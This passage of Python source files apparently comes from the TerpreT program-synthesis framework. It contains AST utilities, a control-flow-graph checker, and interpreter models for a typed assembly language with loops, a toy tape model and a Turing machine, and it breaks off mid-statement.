dims.append(ast.Slice(lower=lower, upper=upper, step=None))
dims.append(ast.Ellipsis())
ext_slice = ast.ExtSlice(dims=dims)
return ext_slice
def NewCall(func=None, args=None, keywords=None, starargs=None):
if args is None:
args = []
if keywords is None:
keywords = []
if starargs is None:
starargs = []
return ast.Call(func=func, args=args, keywords=keywords, starargs=starargs)
def make_attribute(base_name, value_name):
return ast.Attribute(value=ast.Name(id=base_name), attr=ast.Name(id=value_name))
def reverse_loop(for_node):
assert isinstance(for_node, ast.For)
iter_node = for_node.iter
new_iter_node = NewCall(func=ast.Name(id="reversed"), args=[iter_node])
return ast.For(target=for_node.target, iter=new_iter_node, body=for_node.body)
def var_id(var_node):
if isinstance(var_node, ast.Name):
return var_node.id
elif isinstance(var_node, ast.Subscript):
return var_node.value.id
def returns_to_args(returns):
return_value = returns.value
if isinstance(return_value, ast.Tuple):
return [var_to_dvar(elt) for elt in return_value.elts]
elif isinstance(return_value, ast.Name):
return [var_to_dvar(return_value)]
else:
assert False
def ancestors_by_type(node):
pass
def get_condition_rhs_num(if_node):
assert isinstance(if_node, ast.If)
assert isinstance(if_node.test, ast.Compare)
assert isinstance(if_node.test.comparators[0], ast.Num)
return if_node.test.comparators[0].n
def get_condition_lhs(if_node):
assert isinstance(if_node, ast.If)
assert isinstance(if_node.test, ast.Compare)
return unparse(if_node.test.left).strip()
def is_set_to_call(node):
if not isinstance(node, ast.Call): return False
if not isinstance(node.func, ast.Attribute): return False
return node.func.attr == "set_to"
def is_set_to(node):
if not isinstance(node, ast.Expr): return False
return is_set_to_call(node.value)
def is_set_as_input(node):
if not isinstance(node, ast.Expr): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
return node.value.func.attr == "set_as_input"
def is_set_as_output(node):
if not isinstance(node, ast.Expr): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
return node.value.func.attr == "set_as_output"
def ifs_in_elif_block(if_node):
result = [if_node]
while len(if_node.orelse) == 1:
if_node = if_node.orelse[0]
result.append(if_node)
return result
def stmt_from_str(s):
return ast.parse(s).body[0]
def split_name_case(name):
assert False, "doesn't handle X > 9 case"
suffix = name[-len("_caseX"):]
name = name[:-len("_caseX")]
return name, int(suffix[-1])
def dict_to_ast(d):
kvs = ",".join(["'%s': %s" % (k, v) for k, v in sorted(d.iteritems(), key=lambda x: x[0])])
return "{ %s }" % kvs
def object_to_ast(obj):
return ast.parse(str(eval('obj'))).body[0]
def strip_copy_from_name(name):
"""
Removes a trailing _copyX from a name.
"""
ends_in_digit = name[-1].isdigit()
if not ends_in_digit: return name
while ends_in_digit:
name = name[:-1]
ends_in_digit = name[-1].isdigit()
if name.endswith("_case"):
return name[:-len("_case")]
else:
return name
class CFGBuilder(ast.NodeVisitor):
def __init__(self):
self.__next_id = 1
self.__nodes = {} #Maps id -> node
self.__out_edges = {} #Maps id -> id*, signifying possible flow of control
def add_node(self, node):
id = self.__next_id
self.__next_id = id + 1
self.__nodes[id] = node
return id
def add_edge(self, source, target):
assert(source in self.__nodes)
assert(target in self.__nodes)
out_edges = self.__out_edges.get(source, None)
if out_edges is None:
out_edges = []
self.__out_edges[source] = out_edges
out_edges = out_edges.append(target)
#Visit methods return a tuple (in, outs), where in is the node id of the unique
#entry to the visited AST node, and outs is the list of all possible exits.
def visit_For(self, node):
raise Exception("TerpreT restriction checking only works on fully unrolled code")
def visit_While(self, node):
raise Exception("TerpreT restriction checking only works on fully unrolled code")
def visit_With(self, node):
raise Exception("TerpreT restriction checking only works on fully unrolled code")
def visit_Block(self, nodes):
if len(nodes) < 1:
raise Exception("Cannot handle empty block")
(entry_id, out_ids) = self.visit(nodes[0])
for i in xrange(1, len(nodes)):
(in_id, new_out_ids) = self.visit(nodes[i])
for old_out_id in out_ids:
self.add_edge(old_out_id, in_id)
out_ids = new_out_ids
return (entry_id, out_ids)
def visit_FunctionDef(self, node):
if len(filter(lambda dec: dec.func.id == "Runtime", node.decorator_list)) > 0:
this_id = self.add_node(node)
return (this_id, [this_id])
else:
raise Exception("TerpreT only allows use of @Runtime functions in execution models.")
def visit_If(self, node):
this_id = self.add_node(node)
(then_in, then_outs) = self.visit_Block(node.body)
self.add_edge(this_id, then_in)
outs = then_outs
if len(node.orelse) > 0:
(else_in, else_outs) = self.visit_Block(node.orelse)
self.add_edge(this_id, else_in)
outs = outs + else_outs
else:
outs = outs + [this_id]
return (this_id, outs)
def visit_Call(self, node):
this_id = self.add_node(node)
return (this_id, [this_id])
def visit_Expr(self, node):
this_id = self.add_node(node)
return (this_id, [this_id])
def visit_Assign(self, node):
this_id = self.add_node(node)
return (this_id, [this_id])
def visit_Module(self, node):
return self.visit_Block(node.body)
def generic_visit(self, node):
raise Exception("Unhandled node in CFG constructor: %s (%s)" % (astunparse.unparse(node), str(node)))
def get_variables(root):
class Visitor(ast.NodeVisitor):
def __init__(self):
self.vars = set()
def visit_Name(self, node):
self.vars.add(node.id)
var_visitor = Visitor()
var_visitor.visit(root)
return var_visitor.vars
def read_inputs(model_filename, hypers_filename, data_filename, train_batch='train'):
# Get source, and start substituting in:
print ("Reading interpreter model from '%s'." % model_filename)
with open(model_filename, 'r') as f:
model = f.read()
parsed_model = ast.parse(model)
# Find right data batch:
print ("Reading example data from '%s'." % data_filename)
with open(data_filename, 'r') as f:
data_batch_list = json.load(f)
data_batch = None
for batch in data_batch_list:
if batch['batch_name'] == train_batch:
data_batch = batch
assert data_batch is not None
# Find right hypers:
print ("Reading model parameters for configuration '%s' from '%s'." % (data_batch['hypers'], hypers_filename))
with open(hypers_filename, 'r') as f:
hypers_list = json.load(f)
hypers = None
for hyper_name, hyper_settings in hypers_list.iteritems():
if hyper_name == data_batch['hypers']:
hypers = hyper_settings
assert hypers is not None
model_name = os.path.splitext(os.path.basename(model_filename))[0]
data_name = os.path.splitext(os.path.basename(data_filename))[0]
out_name = os.path.join("%s-%s-%s" % (model_name,
data_name,
train_batch))
return (parsed_model, data_batch, hypers, out_name)
```
#### File: TerpreT/models/nfp_assembly_loops_typed.py
```python
from dummy import Hyper, Param, Var, Runtime, Input, Output, Inline
#### Parameters to the model (changes in this block should not require
#### any changes in the actual model)
maxInt = Hyper()
inputNum = Hyper()
inputStackSize = Hyper()
prefixLength = Hyper()
loopBodyLength = Hyper()
suffixLength = Hyper()
extraRegisterNum = Hyper()
#### Inputs:
##We first need to work out the size of the stack:
#The loop can run at most for the number of input elements + what was allocated in the prefix:
maxLoopsteps = inputStackSize + prefixLength
#One initial timestep, prefix, the loop, suffix:
numTimesteps = 1 + prefixLength + (loopBodyLength * maxLoopsteps) + suffixLength
# The number of stack cells is dependent on the number of instructions and inputs as follows:
# - 1 for Nil
# - inputStackSize
# - prefixLength (as each instruction can allocate a cell)
# - maxLoopsteps (as we create one cell after each iteration)
# - maxLoopsteps * loopBodyLength (as each loopBody instruction can allocate a cell)
# - suffixLength (as each instruction can allocate a cell)
stackPtrAtPrefixStart = 1 + inputStackSize
stackPtrAtLoopStart = stackPtrAtPrefixStart + prefixLength
stackSize = stackPtrAtLoopStart + maxLoopsteps * loopBodyLength + suffixLength
# Registers allow the inputs, the extras, and three additional ones in the loop:
registerNum = inputNum + extraRegisterNum
loopRegisterNum = registerNum + 2
inputRegIntVal = Input(maxInt)[inputNum]
inputRegPtrVal = Input(stackSize)[inputNum]
inputRegBoolVal = Input(2)[inputNum]
inputStackIntVal = Input(maxInt)[inputStackSize]
inputStackPtrVal = Input(stackSize)[inputStackSize]
#### Outputs
outputRegIntVal = Output(maxInt)
outputRegPtrVal = Var(stackSize) #Data structure output is special, see end of file
outputRegBoolVal = Output(2)
outputListVal = Output(maxInt)[stackSize]
#### Execution model description
## Loops: foreach in l, foreach in zip l1, l2
numLoops = 2
#### Instructions: cons, cdr, car, nil/zero/false, add, inc, eq, gt, and, ite, one/true, noop / copy, dec, or
numInstructions = 14
boolSize = 2
@Runtime([maxInt, maxInt], maxInt)
def Add(x, y): return (x + y) % maxInt
@Runtime([maxInt], maxInt)
def Inc(x): return (x + 1) % maxInt
@Runtime([maxInt], maxInt)
def Dec(x): return (x - 1) % maxInt
@Runtime([maxInt, maxInt], boolSize)
def EqTest(a, b): return 1 if a == b else 0
@Runtime([maxInt, maxInt], boolSize)
def GtTest(a, b): return 1 if a > b else 0
@Runtime([boolSize, boolSize], boolSize)
def And(a, b): return 1 if a == 1 and b == 1 else 0
@Runtime([boolSize, boolSize], boolSize)
def Or(a, b): return 1 if a == 1 or b == 1 else 0
# Modeling helper functions, not actual instructions:
@Runtime([registerNum, registerNum], boolSize)
def RegEqTest(a, b): return 1 if a == b else 0
@Runtime([stackSize, stackSize+1], boolSize)
def PtrIsNull(ptr, curStackPtr): return 1 if (ptr == 0 or ptr >= curStackPtr) else 0
@Runtime([stackSize, stackSize, stackSize+1], boolSize)
def OnePtrIsNull(ptr1, ptr2, curStackPtr): return 1 if (ptr1 == 0 or ptr1 >= curStackPtr) or (ptr2 == 0 or ptr2 >= curStackPtr) else 0
## Prefix instructions and arguments
prefixInstructions = Param(numInstructions)[prefixLength]
prefixInstructionsArg1 = Param(registerNum)[prefixLength]
prefixInstructionsArg2 = Param(registerNum)[prefixLength]
prefixInstructionsCondition = Param(registerNum)[prefixLength]
prefixInstructionsOut = Param(registerNum)[prefixLength]
## Suffix instructions and arguments.
suffixInstructions = Param(numInstructions)[suffixLength]
suffixInstructionsArg1 = Param(registerNum)[suffixLength]
suffixInstructionsArg2 = Param(registerNum)[suffixLength]
suffixInstructionsCondition = Param(registerNum)[suffixLength]
suffixInstructionsOut = Param(registerNum)[suffixLength]
## Choosing the loop, its instructions and their arguments:
loop = Param(numLoops)
loopInputList1 = Param(registerNum)
loopInputList2 = Param(registerNum)
loopBodyInstructions = Param(numInstructions)[loopBodyLength]
loopBodyInstructionsOut = Param(registerNum)[loopBodyLength]
loopBodyInstructionsArg1 = Param(loopRegisterNum)[loopBodyLength]
loopBodyInstructionsArg2 = Param(loopRegisterNum)[loopBodyLength]
loopBodyInstructionsCondition = Param(registerNum)[loopBodyLength]
#### Execution data description
## Stack
stackIntVal = Var(maxInt)[stackSize]
stackPtrVal = Var(stackSize)[stackSize]
## Program registers
regIntVal = Var(maxInt)[numTimesteps, registerNum]
regPtrVal = Var(stackSize)[numTimesteps, registerNum]
regBoolVal = Var(2)[numTimesteps, registerNum]
## Pointers to the current loop element, and values:
curLoopElementPtr1 = Var(stackSize)[maxLoopsteps + 1]
curLoopElementPtr2 = Var(stackSize)[maxLoopsteps + 1]
curLoopElementVal1 = Var(maxInt)[maxLoopsteps]
curLoopElementVal2 = Var(maxInt)[maxLoopsteps]
## Temporary things:
# Temp variable that marks that we've reached the end of the list (and
# just sit out the remaining loop steps)
listIsOver = Var(boolSize)[maxLoopsteps + 1]
# Temp variables containing the input arguments (to simplify the remainder of the model)
tmpPrefixArg1IntVal = Var(maxInt)[prefixLength]
tmpPrefixArg1PtrVal = Var(stackSize)[prefixLength]
tmpPrefixArg1BoolVal = Var(2)[prefixLength]
tmpPrefixArg2IntVal = Var(maxInt)[prefixLength]
tmpPrefixArg2PtrVal = Var(stackSize)[prefixLength]
tmpPrefixArg2BoolVal = Var(2)[prefixLength]
tmpPrefixOutIntVal = Var(maxInt)[prefixLength]
tmpPrefixOutPtrVal = Var(stackSize)[prefixLength]
tmpPrefixOutBoolVal = Var(2)[prefixLength]
tmpPrefixConditionVal = Var(2)[prefixLength]
tmpPrefixDoWriteReg = Var(2)[prefixLength, registerNum]
tmpLoopBodyArg1IntVal = Var(maxInt)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg1PtrVal = Var(stackSize)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg1BoolVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg2IntVal = Var(maxInt)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg2PtrVal = Var(stackSize)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg2BoolVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyOutIntVal = Var(maxInt)[maxLoopsteps, loopBodyLength]
tmpLoopBodyOutPtrVal = Var(stackSize)[maxLoopsteps, loopBodyLength]
tmpLoopBodyOutBoolVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyConditionVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyDoWriteReg = Var(2)[maxLoopsteps, loopBodyLength, registerNum]
tmpSuffixArg1IntVal = Var(maxInt)[suffixLength]
tmpSuffixArg1PtrVal = Var(stackSize)[suffixLength]
tmpSuffixArg1BoolVal = Var(2)[suffixLength]
tmpSuffixArg2IntVal = Var(maxInt)[suffixLength]
tmpSuffixArg2PtrVal = Var(stackSize)[suffixLength]
tmpSuffixArg2BoolVal = Var(2)[suffixLength]
tmpSuffixOutIntVal = Var(maxInt)[suffixLength]
tmpSuffixOutPtrVal = Var(stackSize)[suffixLength]
tmpSuffixOutBoolVal = Var(2)[suffixLength]
tmpSuffixConditionVal = Var(2)[suffixLength]
tmpSuffixDoWriteReg = Var(2)[suffixLength, registerNum]
@Inline()
def ExecuteInstruction(instruction,
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr, outPtrStack, outIntStack):
#Do the actual execution. Every instruction sets its
#corresponding register value, and the two heap cells:
if instruction == 0: # cons
outInt.set_to(0)
outPtr.set_to(curStackPtr)
outBool.set_to(0)
outIntStack.set_to(arg1Int)
outPtrStack.set_to(arg2Ptr)
elif instruction == 1: # car
with arg1Ptr as p:
if p < curStackPtr:
outInt.set_to(stackIntVal[p])
else:
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 2: # cdr
outInt.set_to(0)
with arg1Ptr as p:
if p < curStackPtr:
outPtr.set_to(stackPtrVal[p])
else:
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 3: # nil/zero/false
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 4: # add
outInt.set_to(Add(arg1Int, arg2Int))
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 5: # inc
outInt.set_to(Inc(arg1Int))
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 6: # eq
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(EqTest(arg1Int, arg2Int))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 7: # gt
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(GtTest(arg1Int, arg2Int))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 8: # and
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(And(arg1Bool, arg2Bool))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 9: # ite
if condition == 1:
outInt.set_to(arg1Int)
outPtr.set_to(arg1Ptr)
outBool.set_to(arg1Bool)
elif condition == 0:
outInt.set_to(arg2Int)
outPtr.set_to(arg2Ptr)
outBool.set_to(arg2Bool)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 10: # one/true
outInt.set_to(1)
outPtr.set_to(0)
outBool.set_to(1)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 11: # noop/copy
outInt.set_to(arg1Int)
outPtr.set_to(arg1Ptr)
outBool.set_to(arg1Bool)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 12: # dec
outInt.set_to(Dec(arg1Int))
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 13: # or
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(Or(arg1Bool, arg2Bool))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
##### Setting up inputs:
#Copy input registers to temporary registers, set extras to 0:
for i in range(inputNum):
regIntVal[0, i].set_to(inputRegIntVal[i])
regPtrVal[0, i].set_to(inputRegPtrVal[i])
regBoolVal[0, i].set_to(inputRegBoolVal[i])
for r in range(inputNum, registerNum):
regIntVal[0, r].set_to(0)
regPtrVal[0, r].set_to(0)
regBoolVal[0, r].set_to(0)
#Initialize nil element at bottom of stack:
stackIntVal[0].set_to(0)
stackPtrVal[0].set_to(0)
#Copy input stack into our temporary representation:
for i in range(inputStackSize):
stackIntVal[1 + i].set_to(inputStackIntVal[i])
stackPtrVal[1 + i].set_to(inputStackPtrVal[i])
##### Run prefix
for t in range(prefixLength):
# Aliases for instruction processing. Instructions are
# of the following form: "out = op arg1 arg2", where
# arg1 and arg2 are either pointers or integers and
# are chosen based on the type of the operator.
outInt = tmpPrefixOutIntVal[t]
outPtr = tmpPrefixOutPtrVal[t]
outBool = tmpPrefixOutBoolVal[t]
arg1Int = tmpPrefixArg1IntVal[t]
arg1Ptr = tmpPrefixArg1PtrVal[t]
arg1Bool = tmpPrefixArg1BoolVal[t]
arg2Int = tmpPrefixArg2IntVal[t]
arg2Ptr = tmpPrefixArg2PtrVal[t]
arg2Bool = tmpPrefixArg2BoolVal[t]
condition = tmpPrefixConditionVal[t]
#Get the inputs:
with prefixInstructionsArg1[t] as r:
arg1Int.set_to(regIntVal[t, r])
arg1Ptr.set_to(regPtrVal[t, r])
arg1Bool.set_to(regBoolVal[t, r])
with prefixInstructionsArg2[t] as r:
arg2Int.set_to(regIntVal[t, r])
arg2Ptr.set_to(regPtrVal[t, r])
arg2Bool.set_to(regBoolVal[t, r])
with prefixInstructionsCondition[t] as r:
condition.set_to(regBoolVal[t, r])
curStackPtr = stackPtrAtPrefixStart + t
ExecuteInstruction(
prefixInstructions[t],
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr,
stackPtrVal[curStackPtr], stackIntVal[curStackPtr])
for r in range(registerNum):
tmpPrefixDoWriteReg[t, r].set_to(RegEqTest(prefixInstructionsOut[t], r))
if tmpPrefixDoWriteReg[t, r] == 0:
regIntVal[t + 1, r].set_to(regIntVal[t, r])
regPtrVal[t + 1, r].set_to(regPtrVal[t, r])
regBoolVal[t + 1, r].set_to(regBoolVal[t, r])
elif tmpPrefixDoWriteReg[t, r] == 1:
regIntVal[t + 1, r].set_to(outInt)
regPtrVal[t + 1, r].set_to(outPtr)
regBoolVal[t + 1, r].set_to(outBool)
t = prefixLength
##### Set up and run loop:
with loopInputList1 as loopList1Reg:
curLoopElementPtr1[0].set_to(regPtrVal[t, loopList1Reg])
with loopInputList2 as loopList2Reg:
curLoopElementPtr2[0].set_to(regPtrVal[t, loopList2Reg])
#Check if we are done with the list:
if loop == 0: # foreach
listIsOver[0].set_to(PtrIsNull(curLoopElementPtr1[0],
stackPtrAtLoopStart))
elif loop == 1: # foreach zip
listIsOver[0].set_to(OnePtrIsNull(curLoopElementPtr1[0],
curLoopElementPtr2[0],
stackPtrAtLoopStart))
ele1RegisterIdx = registerNum
ele2RegisterIdx = registerNum + 1
for l in range(maxLoopsteps):
t = prefixLength + l * loopBodyLength
# At each iteration, we run the loopBody, but first extract current list elements:
if listIsOver[l] == 0:
with curLoopElementPtr1[l] as curPtr1:
if curPtr1 < stackPtrAtLoopStart + l * loopBodyLength:
curLoopElementVal1[l].set_to(stackIntVal[curPtr1])
else:
curLoopElementVal1[l].set_to(0)
with curLoopElementPtr2[l] as curPtr2:
if curPtr2 < stackPtrAtLoopStart + l * loopBodyLength:
curLoopElementVal2[l].set_to(stackIntVal[curPtr2])
else:
curLoopElementVal2[l].set_to(0)
#Execute the body of our loopBody:
for i in range(0, loopBodyLength):
t = prefixLength + l * loopBodyLength + i
# Aliases for instruction processing. Instructions are
# of the following form: "out = op arg1 arg2", where
# arg1 and arg2 are either pointers or integers and
# are chosen based on the type of the operator.
outInt = tmpLoopBodyOutIntVal[l, i]
outPtr = tmpLoopBodyOutPtrVal[l, i]
outBool = tmpLoopBodyOutBoolVal[l, i]
arg1Int = tmpLoopBodyArg1IntVal[l, i]
arg1Ptr = tmpLoopBodyArg1PtrVal[l, i]
arg1Bool = tmpLoopBodyArg1BoolVal[l, i]
arg2Int = tmpLoopBodyArg2IntVal[l, i]
arg2Ptr = tmpLoopBodyArg2PtrVal[l, i]
arg2Bool = tmpLoopBodyArg2BoolVal[l, i]
condition = tmpLoopBodyConditionVal[l, i]
#Get the inputs:
with loopBodyInstructionsArg1[i] as r:
if r == ele1RegisterIdx:
arg1Int.set_to(curLoopElementVal1[l])
arg1Ptr.set_to(0)
arg1Bool.set_to(0)
elif r == ele2RegisterIdx:
arg1Int.set_to(curLoopElementVal2[l])
arg1Ptr.set_to(0)
arg1Bool.set_to(0)
else:
arg1Int.set_to(regIntVal[t, r])
arg1Ptr.set_to(regPtrVal[t, r])
arg1Bool.set_to(regBoolVal[t, r])
with loopBodyInstructionsArg2[i] as r:
if r == ele1RegisterIdx:
arg2Int.set_to(curLoopElementVal1[l])
arg2Ptr.set_to(0)
arg2Bool.set_to(0)
elif r == ele2RegisterIdx:
arg2Int.set_to(curLoopElementVal2[l])
arg2Ptr.set_to(0)
arg2Bool.set_to(0)
else:
arg2Int.set_to(regIntVal[t, r])
arg2Ptr.set_to(regPtrVal[t, r])
arg2Bool.set_to(regBoolVal[t, r])
with loopBodyInstructionsCondition[i] as r:
condition.set_to(regBoolVal[t, r])
#Stack pointer: number of full iterations we already
#did * size of the loopBody body + how far we are in
#this one:
curStackPtr = stackPtrAtLoopStart + l * loopBodyLength + i
ExecuteInstruction(
loopBodyInstructions[i],
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr,
stackPtrVal[curStackPtr], stackIntVal[curStackPtr])
for r in range(registerNum):
tmpLoopBodyDoWriteReg[l, i, r].set_to(RegEqTest(loopBodyInstructionsOut[i], r))
if tmpLoopBodyDoWriteReg[l, i, r] == 0:
regIntVal[t+1, r].set_to(regIntVal[t, r])
regPtrVal[t+1, r].set_to(regPtrVal[t, r])
regBoolVal[t+1, r].set_to(regBoolVal[t, r])
elif tmpLoopBodyDoWriteReg[l, i, r] == 1:
regIntVal[t+1, r].set_to(outInt)
regPtrVal[t+1, r].set_to(outPtr)
regBoolVal[t+1, r].set_to(outBool)
#Move list pointer for next round already:
stackPtrAtLoopBodyEnd = stackPtrAtLoopStart + (l + 1) * loopBodyLength - 1
with curLoopElementPtr1[l] as curElePtr1:
if curElePtr1 < stackPtrAtLoopBodyEnd:
curLoopElementPtr1[l + 1].set_to(stackPtrVal[curElePtr1])
else:
curLoopElementPtr1[l + 1].set_to(0)
with curLoopElementPtr2[l] as curElePtr2:
if curElePtr2 < stackPtrAtLoopBodyEnd:
curLoopElementPtr2[l + 1].set_to(stackPtrVal[curElePtr2])
else:
curLoopElementPtr2[l + 1].set_to(0)
#Check if the next list element is empty:
if loop == 0: # foreach
listIsOver[l + 1].set_to(PtrIsNull(curLoopElementPtr1[l + 1],
stackPtrAtLoopBodyEnd))
elif loop == 1: # foreach zip
listIsOver[l + 1].set_to(OnePtrIsNull(curLoopElementPtr1[l + 1],
curLoopElementPtr2[l + 1],
stackPtrAtLoopBodyEnd))
elif listIsOver[l] == 1:
listIsOver[l + 1].set_to(1)
curLoopElementPtr1[l + 1].set_to(0)
curLoopElementPtr2[l + 1].set_to(0)
#We still need to initialise the stack cells for all these steps to 0:
for i in range(0, loopBodyLength):
# Copy register forwards.
t = prefixLength + l * loopBodyLength + i
for r in range(registerNum):
regPtrVal[t + 1, r].set_to(regPtrVal[t, r])
regBoolVal[t + 1, r].set_to(regBoolVal[t, r])
regIntVal[t + 1, r].set_to(regIntVal[t, r])
curStackPtr = stackPtrAtLoopStart + l * loopBodyLength + i
stackIntVal[curStackPtr].set_to(0)
stackPtrVal[curStackPtr].set_to(0)
##### Run suffix
stackPtrAtSuffixStart = stackPtrAtLoopStart + maxLoopsteps * loopBodyLength
for i in range(suffixLength):
t = prefixLength + loopBodyLength * maxLoopsteps + i
# Aliases for instruction processing. Instructions are
# of the following form: "out = op arg1 arg2", where
# arg1 and arg2 are either pointers or integers and
# are chosen based on the type of the operator.
outInt = tmpSuffixOutIntVal[i]
outPtr = tmpSuffixOutPtrVal[i]
outBool = tmpSuffixOutBoolVal[i]
arg1Int = tmpSuffixArg1IntVal[i]
arg1Ptr = tmpSuffixArg1PtrVal[i]
arg1Bool = tmpSuffixArg1BoolVal[i]
arg2Int = tmpSuffixArg2IntVal[i]
arg2Ptr = tmpSuffixArg2PtrVal[i]
arg2Bool = tmpSuffixArg2BoolVal[i]
condition = tmpSuffixConditionVal[i]
#Get the inputs:
with suffixInstructionsArg1[i] as r:
arg1Int.set_to(regIntVal[t, r])
arg1Ptr.set_to(regPtrVal[t, r])
arg1Bool.set_to(regBoolVal[t, r])
with suffixInstructionsArg2[i] as r:
arg2Int.set_to(regIntVal[t, r])
arg2Ptr.set_to(regPtrVal[t, r])
arg2Bool.set_to(regBoolVal[t, r])
with suffixInstructionsCondition[i] as r:
condition.set_to(regBoolVal[t, r])
curStackPtr = stackPtrAtSuffixStart + i
ExecuteInstruction(
suffixInstructions[i],
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr,
stackPtrVal[curStackPtr], stackIntVal[curStackPtr])
for r in range(registerNum):
tmpSuffixDoWriteReg[i, r].set_to(RegEqTest(suffixInstructionsOut[i], r))
if tmpSuffixDoWriteReg[i, r] == 0:
regIntVal[t+1, r].set_to(regIntVal[t, r])
regPtrVal[t+1, r].set_to(regPtrVal[t, r])
regBoolVal[t+1, r].set_to(regBoolVal[t, r])
elif tmpSuffixDoWriteReg[i, r] == 1:
regIntVal[t+1, r].set_to(outInt)
regPtrVal[t+1, r].set_to(outPtr)
regBoolVal[t+1, r].set_to(outBool)
#Copy registers to output:
outputRegIntVal.set_to(regIntVal[numTimesteps - 1, registerNum - 1])
outputRegPtrVal.set_to(regPtrVal[numTimesteps - 1, registerNum - 1])
outputRegBoolVal.set_to(regBoolVal[numTimesteps - 1, registerNum - 1])
#Copt stack to output
outputListCopyPos = Var(stackSize)[stackSize + 1]
outputListCopyPos[0].set_to(outputRegPtrVal)
for n in range(stackSize):
with outputListCopyPos[n] as p:
outputListVal[n].set_to(stackIntVal[p])
outputListCopyPos[n + 1].set_to(stackPtrVal[p])
```
#### File: TerpreT/models/test1.py
```python
const_T = Hyper()
const_M = Hyper()
@Runtime([const_M, const_M, const_M], const_M)
def Update(prev, cur, offset):
return (prev + cur + offset) % 2
offset = Param(const_M)
do_anything = Param(2)
initial_tape = Input(const_M)[2]
tape = Var(const_M)[const_T]
for t in range(2):
tape[t].set_to(initial_tape[t])
for t in range(2, const_T):
if do_anything == 1:
tape[t].set_to(Update(tape[t - 2], tape[t - 1], offset))
elif do_anything == 0:
tape[t].set_to(tape[t - 1])
final_tape = Output(const_M)
final_tape.set_to(tape[const_T - 1])
```
#### File: TerpreT/models/turing.py
```python
from dummy import Hyper, Param, Var, Runtime, Input, Output, Inline
numTapeSymbols = Hyper()
numHeadStates = Hyper()
tapeLength = Hyper()
numTimesteps = Hyper()
boolSize = 2
numDirections = 3
# Inputs and Output
initial_tape = Input(numTapeSymbols)[tapeLength]
final_is_halted = Output(2)
final_tape = Output(numTapeSymbols)[tapeLength]
# Turing Machine parameters
write = Param(numTapeSymbols)[numHeadStates, numTapeSymbols]
dir = Param(numDirections)[numHeadStates, numTapeSymbols]
newState = Param(numHeadStates)[numHeadStates, numTapeSymbols]
@Runtime([tapeLength, numDirections], tapeLength)
def move(pos, dir):
if dir == 0:
return pos
elif dir == 1:
return (pos + 1) % tapeLength
elif dir == 2:
return (pos - 1) % tapeLength
@Runtime([tapeLength, tapeLength], boolSize)
def EqualityTest(a, b): return 1 if a == b else 0
@Runtime([numHeadStates, numHeadStates], boolSize)
def EqualityTestState(a, b): return 1 if a == b else 0
# State of tape and head during execution:
tape = Var(numTapeSymbols)[numTimesteps, tapeLength]
curPos = Var(tapeLength)[numTimesteps]
curState = Var(numHeadStates)[numTimesteps]
isHalted = Var(boolSize)[numTimesteps]
# Temporary values:
tmpActiveCell = Var(boolSize)[numTimesteps - 1, tapeLength]
tmpCurSymbol = Var(numTapeSymbols)[numTimesteps - 1]
# Constant start state
curPos[0].set_to(0)
curState[0].set_to(1)
isHalted[0].set_to(0)
for p in range(tapeLength):
tape[0, p].set_to(initial_tape[p])
for t in range(numTimesteps - 1):
if isHalted[t] == 1:
for m in range(tapeLength):
tape[t + 1, m].set_to(tape[t, m])
curState[t + 1].set_to(curState[t])
curPos[t + 1].set_to(curPos[t])
isHalted[t + 1].set_to(isHalted[t])
elif isHalted[t] == 0:
with curState[t] as s:
with curPos[t] as p:
with tape[t, p] as tt:
tmpCurSymbol[t].set_to(write[s, tt])
curPos[t + 1].set_to(move(p, dir[s, tt]))
curState[t + 1].set_to(newState[s, tt])
isHalted[t+1].set_to(EqualityTestState(0, curState[t + 1]))
for m in range(tapeLength):
tmpActiveCell[t, m].set_to(EqualityTest(m, curPos[t]))
if tmpActiveCell[t, m] == 1:
tape[t + 1, m].set_to(tmpCurSymbol[t])
elif tmpActiveCell[t, m] == 0:
